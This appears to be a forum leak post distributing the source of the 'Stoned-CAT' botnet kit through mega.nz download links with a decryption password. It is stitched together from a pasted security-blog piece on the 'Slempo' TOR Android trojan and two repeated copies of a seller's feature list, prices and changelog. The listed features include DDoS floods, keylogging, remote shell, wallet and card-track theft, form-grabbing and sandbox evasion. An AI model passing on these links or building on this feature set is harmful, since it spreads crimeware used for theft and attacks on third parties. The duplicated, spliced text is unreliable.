22222
This is basically the full source to the infamous Stoned-CAT Bot.
It is only available on a few sites that you either have to pay $700 for access, other sites you need huge reputation, or pay legit to exploit.io. ($1,000 - $3,000).
I Haven't tested anything on it, just quickly perused through the source.
NB: DO NOT RUN ANY BINARIES IN THE SOURCE. I HAVEN'T TESTED OR SCANNED MOST OF THEM.
JUST COMPILE AND CHECK THE SOURCE YOURSELF. IF YOU FEEL THE NEED TO RUN THEM
BINARIES, MAKE SURE TO DO SO IN A VM OR SANDBOX!
The source includes both the PANEL and the APK Builder.
Botnet creators have attempted numerous tactics for hiding their presence, traffic and locations of their command and control (CnC) servers.
To this end, we have seen the development of such things as DGA or Domain Generation Algorithms, which dynamically create new CnC addresses that are pre-created by the botnet owners to have their traffic move frequently to avoid detection/blocking.
We have also seen the use of TOR, the anonymous “under-web” used to host CnC servers with little likelihood that the owners of the servers would be discovered.
Although most of these advancements in botnet technology have been made specifically for the desktop, we are seeing a huge push to employ these same tactics on mobile platforms such as Android.
Today, an article posted by Roman Unuchek of Kaspersky described the discovery of the first “TOR Trojan for Android” and how cyber criminals have taken the source code for Orbot, a TOR network client for Android, and modified it with malicious functionality, such as that a Bot would have. These features include:
Interception and hiding of all incoming / outgoing messages
Interception of incoming / outgoing messages only from senders point of view
Wiretapping incoming / outgoing messages without hiding them
Sending messages from the device
Execution of codes remotely as well as obtaining a response from the bot
Request GPS coordinates and display them on Google Maps
Kaspersky uses the vendor name Backdoor.AndroidOS.Torec.a, however, we think the official name of this threat is “Slempo” and is a variation or evolution of the “Stoned Cat” botnet.
Advertisements for this new “Tor Botnet” includes all the functionality mentioned above and describes the Admin panel as being similar to the Stoned Cat interface. Here are a few screenshots to show you what that looks like:
Stoned2 Stoned1
The current price for obtaining use of the Slempo botnet is $1,000 up front and $500 a month after that.
Unuchek makes some valid points concerning the use of TOR for botnets. On one side, using TOR makes it very difficult to shut down a CnC server and therefore, little concern over losing connection with the bots once they are installed on the mobile devices.
On the other hand, bundling the TOR software with the malware means it is very heavy and would be difficult to download, transfer and operate with much stealth.
I wanted to add that the use of the TOR network is never very efficient and sending data through it may or may not actually make it to the CnC as it might using normal internet methods.
We recommend keeping an eye out for any data usage increases from your mobile device, over-power consumption (running a constant TOR connection will no doubt drain your battery faster than otherwise) and any other kinds of odd behavior.
Be sure to update and run frequent scans
A special thanks to Kafeine for providing additional info on this topic.
Thanks for reading and safe surfing!
download
6.6 MB
https://mega.nz/#!Dd8AHAzY
!lfB3LZ4X82CwaELRZkOtiP0XQPLBiuf91u7-aDPzvxk
https://mega.nz/#!Dd8AHAzY!lfB3LZ4X82CwaELRZkOtiP0XQPLBiuf91u7-aDPzvxk
Encrypted Password :>
6bgeiHDso2dTsRxIk/1rEA==
KEY: lvl23
Encryption: Triple Des [3des].
6bgeiHDso2dTsRxIk/1rEA==
KEY: lvl23
Encryption: Triple Des [3des].
- Basic functionality
* HTTP (S) flood (methods GET \ POST)
* AntiDDOS flood (Emulation js \ cookies)
* Slowloris flood
* Download flooding
* TCP flood
* UDP flood
* Loader (exe, dll, vbs, bat ... + possibility to specify the parameters for the start of the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution via shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Substitution Hosts
* Stilling Win Key
* Reproduction (USB \ Archive)
* Purity downloads (amount found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket
- Additional functions
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services, automatic analysis
* BotKiller
* Bot protection (protection process \ files \ registry branches)
* Unlimited number of simultaneous commands (Some commands have a higher priority in relation to others and their performance stops, etc.)
* Unlimited number of backup domain
* Quiet operation even under a limited user account
* Do not load the CPU
- Functional admin
* A flexible system of creating jobs
* Detailed statistics on bots
* Ability to issue commands to each country individually or bot
* Customizable bots otstuk
* Sort bots in the articles on IP \ line \ Countries \ OS
* The system bans.
- Weight uncompressed binaries ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, starting with XP to 8.1 (x32 / 64)
CHANGELOG!
UPDATE to version 2.2
* The algorithm of communication with the server.
* Improved protection scheme admin.
* All merge files \ logs are now displayed in the article ip; filiname; date; size and convenient search.
* Fixed a bug with the file names generated when installs.
* Improved the keylogger logs is now more readable.
* Minor fixes.
Update 2.9.
Boat:
* Reworked all types of attacks, a temporary fixed "attack" when bots from online attacks.
* Reworked the keylogger is almost no waste, it is possible to monitor several windows at once and, if necessary, disable the removal of screenshots.
* Reworked grabber track1 + track2 - Number of waste in the log is nearing zero.
* Many small changes and extensions.
* Added a call to errors with the specified text when it detects virtual ok \ sandboxes, etc.
Admin:
* Changed the scheme of protection within the admin.
* Changed the return teams now Admin works correctly in combination with certain antiddos protection.
* Increased speed of admin, which is especially noticeable on slower servers with a large number of bots.
* At the request of customers added the ability to upload files to the server through the admin panel.
Blog notes and the FAQ is currently unavailable, but comes complete with bot FAQ (RU \ EN).
Customers who wanted a monopoly on the use of certain functions: if the desire remains - knock, all talk.
Attention:
Functional grabber track1 + track2 available as a module in the standard supply does not include the price of the unit is $ 150.
New customers the price before the end of next week the same, but after rising to $ 300 for a standard without functional modules.
For payment are accepted only temporarily BTC, but for old customers who want to upgrade the product available for payment through WebMoney.
[06:51:07] Troy Rad: Update 3.0.
This update is available as a plug-formgrabber -
-Firefox HTTP + SSL
-Internet Explorer HTTP + SSL
-Chrome HTTP
Logs with formgrabbera available in a user-friendly admin statistics.
Price plug - $ 200
For customers with a full version of the bot module cost - $ 50
3.1 Update:
[+] Formgrabber:
- Added Opera.
- Changed filter formgrabbera.
[+] Admin:
- Changed the protection scheme admin.
- Fixed some minor bugs.
I apologize to all our customers for their long absence - because of the problems with most of the iron sortsy / data has been lost, so we had to start over almost from the beginning.
In connection with this update and change 3.2 -
* Almost completely rewritten formgrabber:
- Added grabbing SSL Chrome.
- Added check the status of hooks in the browser.
* Track1 / 2 grabber -
- Removed team at grabbing dump - now grabber is constantly at work.
- Added a convenient conclusion to the admin panel ripped dump type - Bot ip / Track type / Track data / Process name / Date.
* It is also almost completely rewritten botkiller:
- Now the bot kills 98% of bots.
- Changed the scheme of collecting statistics about detected bots.
* Keylogger
- Now you can keep track of all the windows for that instead of the window, specify - "ALLWINDOW"
* From the list of excluded hidden functional browsing.
Update 3.3
Admin:
* Added ability to register multiple users
* Changed the export of logs, are now large volumes exported more bright
Boat:
* Added functionality FTP sniffer work tested with the following customers:
- FileZilla
- WinSCP
- Smart FTP
- FAR
- Cute FTP
- FTP Rush
- Core FTP
- CoffeeFreeFTP
- FlashFXP
- Total Commander
(*) If you require a client is not listed, knock - add.
- New:
* Rewrote the track 1/2 grabber.
* Updated grabbing SSL chromium.
* Check function on Windows 10
* Improved protection scheme admin.
* Updated GeoIP
- Fixed:
* FTP Sniffer
* Fixed a bug with the counters in the admin tasks.
- Removed:
* Hosts changer
Download
1.5 MB
https://mega.nz/#!jRkwiACJ
!YKspPsioymQtqksC072I8i2fqMXPVs5j4qZEf45ubqY
https://mega.nz/#!jRkwiACJ!YKspPsioymQtqksC072I8i2fqMXPVs5j4qZEf45ubqY
Basic functionality
* HTTP (S) flood (methods GET \ POST)
* AntiDDOS flood (Emulation js \ cookies)
* SmartDDoS
* Slowloris flood
* Download flooding
* TCP flood
* UDP flood
* Loader (exe, dll, vbs, bat ... + possibility to specify the parameters for the start of the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution via shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Substitution Hosts
* Stilling Win Key
* Reproduction (USB \ Archive)
* Purity downloads (amount found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket
- Additional functions
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services, automatic analysis
* BotKiller
* Bot protection (protection process \ files \ registry branches)
* Unlimited number of simultaneous commands (Some commands have a higher priority in relation to others and their performance stops, etc.)
* Unlimited number of backup domain
* Quiet operation even under a limited user account
* Do not load the CPU
- Functional admin
* A flexible system of creating jobs
* Detailed statistics on bots
* Ability to issue commands to each country individually or bot
* Customizable bots otstuk
* Sort bots in the articles on IP \ line \ Countries \ OS
* The system bans.
- Weight uncompressed binaries ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, starting with XP to 8.1 (x32 / 64)
UPDATE to version 2.2
* The algorithm of communication with the server.
* Improved protection scheme admin.
* All merge files \ logs are now displayed in the article ip; filiname; date; size and convenient search.
* Fixed a bug with the file names generated when installs.
* Improved the keylogger logs is now more readable.
* Minor fixes.
Update 2.9.
Boat:
* Reworked all types of attacks, a temporary fixed "attack" when bots from online attacks.
* Reworked the keylogger is almost no waste, it is possible to monitor several windows at once and, if necessary, disable the removal of screenshots.
* Reworked grabber track1 + track2 - Number of waste in the log is nearing zero.
* Many small changes and extensions.
* Added a call to errors with the specified text when it detects virtual ok \ sandboxes, etc.
Admin:
* Changed the scheme of protection within the admin.
* Changed the return teams now Admin works correctly in combination with certain antiddos protection.
* Increased speed of admin, which is especially noticeable on slower servers with a large number of bots.
* At the request of customers added the ability to upload files to the server through the admin panel.
Blog notes and the FAQ is currently unavailable, but comes complete with bot FAQ (RU \ EN).
Customers who wanted a monopoly on the use of certain functions: if the desire remains - knock, all talk.
Attention:
Functional grabber track1 + track2 available as a module in the standard supply does not include the price of the unit is $ 150.
New customers the price before the end of next week the same, but after rising to $ 300 for a standard without functional modules.
For payment are accepted only temporarily BTC, but for old customers who want to upgrade the product available for payment through WebMoney.
[06:51:07] Troy Rad: Update 3.0.
This update is available as a plug-formgrabber -
-Firefox HTTP + SSL
-Internet Explorer HTTP + SSL
-Chrome HTTP
3.1 Update:
[+] Formgrabber:
- Added Opera.
- Changed filter formgrabbera.
[+] Admin:
- Changed the protection scheme admin.
- Fixed some minor bugs.
I apologize to all our customers for their long absence - because of the problems with most of the iron sortsy / data has been lost, so we had to start over almost from the beginning.
In connection with this update and change 3.2 -
* Almost completely rewritten formgrabber:
- Added grabbing SSL Chrome.
- Added check the status of hooks in the browser.
* Track1 / 2 grabber -
- Removed team at grabbing dump - now grabber is constantly at work.
- Added a convenient conclusion to the admin panel ripped dump type - Bot ip / Track type / Track data / Process name / Date.
* It is also almost completely rewritten botkiller:
- Now the bot kills 98% of bots.
- Changed the scheme of collecting statistics about detected bots.
* Keylogger
- Now you can keep track of all the windows for that instead of the window, specify - "ALLWINDOW"
* From the list of excluded hidden functional browsing.
Update 3.3
Admin:
* Added ability to register multiple users
* Changed the export of logs, are now large volumes exported more bright
Boat:
* Added functionality FTP sniffer work tested with the following customers:
- FileZilla
- WinSCP
- Smart FTP
- FAR
- Cute FTP
- FTP Rush
- Core FTP
- CoffeeFreeFTP
- FlashFXP
- Total Commander
(*) If you require a client is not listed, knock - add.
- New:
* Rewrote the track 1/2 grabber.
* Updated grabbing SSL chromium.
* Check function on Windows 10
* Improved protection scheme admin.
* Updated GeoIP
- Fixed:
* FTP Sniffer
* Fixed a bug with the counters in the admin tasks.
- Removed:
* Hosts changer
Download
https://mega.nz/#!zUcBmTzI
1.0 MB
!rMKFtzNnmx9KxDfR1wGNMT1OFIveh_fkXeKrMIQdD0o
https://mega.nz/#!zUcBmTzI!rMKFtzNnmx9KxDfR1wGNMT1OFIveh_fkXeKrMIQdD0